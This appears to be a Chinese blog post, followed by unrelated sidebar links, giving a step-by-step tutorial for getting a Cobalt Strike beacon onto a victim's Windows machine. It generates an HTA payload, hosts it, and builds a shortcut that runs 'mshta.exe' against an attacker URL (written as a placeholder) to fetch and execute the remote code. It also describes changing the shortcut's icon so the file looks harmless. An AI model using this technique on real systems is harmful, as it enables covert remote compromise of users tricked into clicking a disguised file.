当前位置:网站首页>利用快捷方式-LNK-上线CS
利用快捷方式-LNK-上线CS
2022-07-06 06:24:00 【zxl2605】
步骤:
1、生成:Attacks -> Packages -> Html Application
2、上传:Attacks——>Web Drive by——>Host file
3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、伪装:
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装
这里会用到windows中的mshta,用于执行hta文件
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件
下面进行演示
打开已经配置好的CS
1、生成:Attacks -> Packages -> Html Application
选择设置的监听器-power shell
生成evil.hta
2、上传:Attacks——>Web Drive by——>Host file
复制生成的利用文件网址
3.创建快捷方式
4.执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
5.伪装(自行拓展,不做演示)
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装(自行扩展)
点击快捷方式-快捷方式成功上线
边栏推荐
- 模拟卷Leetcode【普通】1447. 最简分数
- 模拟卷Leetcode【普通】1219. 黄金矿工
- Redis core technology and basic architecture of actual combat: what does a key value database contain?
- Summary of the post of "Web Test Engineer"
- 自定义指定路由上的Gateway过滤器工厂
- Simulation volume leetcode [general] 1218 Longest definite difference subsequence
- 专业论文翻译,英文摘要如何写比较好
- Digital triangle model acwing 1015 Picking flowers
- 模拟卷Leetcode【普通】1143. 最长公共子序列
- 私人云盘部署
猜你喜欢
Play video with Tencent video plug-in in uni app
Manage configuration using Nacos
Properties file
Redis 核心技术与实战之 基本架构:一个键值数据库包含什么?
![[web security] nodejs prototype chain pollution analysis](/img/b6/8eddc9cbe343f2439da92bf342b0dc.jpg)
[web security] nodejs prototype chain pollution analysis
Isam2 operation process
Customize the gateway filter factory on the specified route
【MQTT从入门到提高系列 | 01】从0到1快速搭建MQTT测试环境
LeetCode 1200. Minimum absolute difference
G - Supermarket
随机推荐
Error getting a new connection Cause: org. apache. commons. dbcp. SQLNestedException
端午节快乐Wish Dragon Boat Festival is happy
QT: the program input point xxxxx cannot be located in the dynamic link library.
Digital triangle model acwing 1015 Picking flowers
MFC on the conversion and display of long string unsigned char and CString
php使用redis实现分布式锁
Left matching principle of joint index
Lecture 8: 1602 LCD (Guo Tianxiang)
Basic knowledge of MySQL
Simulation volume leetcode [general] 1143 Longest common subsequence
win10无法操作(删除、剪切)文件
MFC dynamically creates dialog boxes and changes the size and position of controls
Full link voltage measurement: building three models
在uni-app中使用腾讯视频插件播放视频
keil MDK中删除添加到watch1中的变量
在JEECG-boot代码生成的基础上修改list页面(结合自定义的组件)
Aike AI frontier promotion (2.13)
oscp raven2靶机渗透过程
Online and offline problems
Simulation volume leetcode [general] 1447 Simplest fraction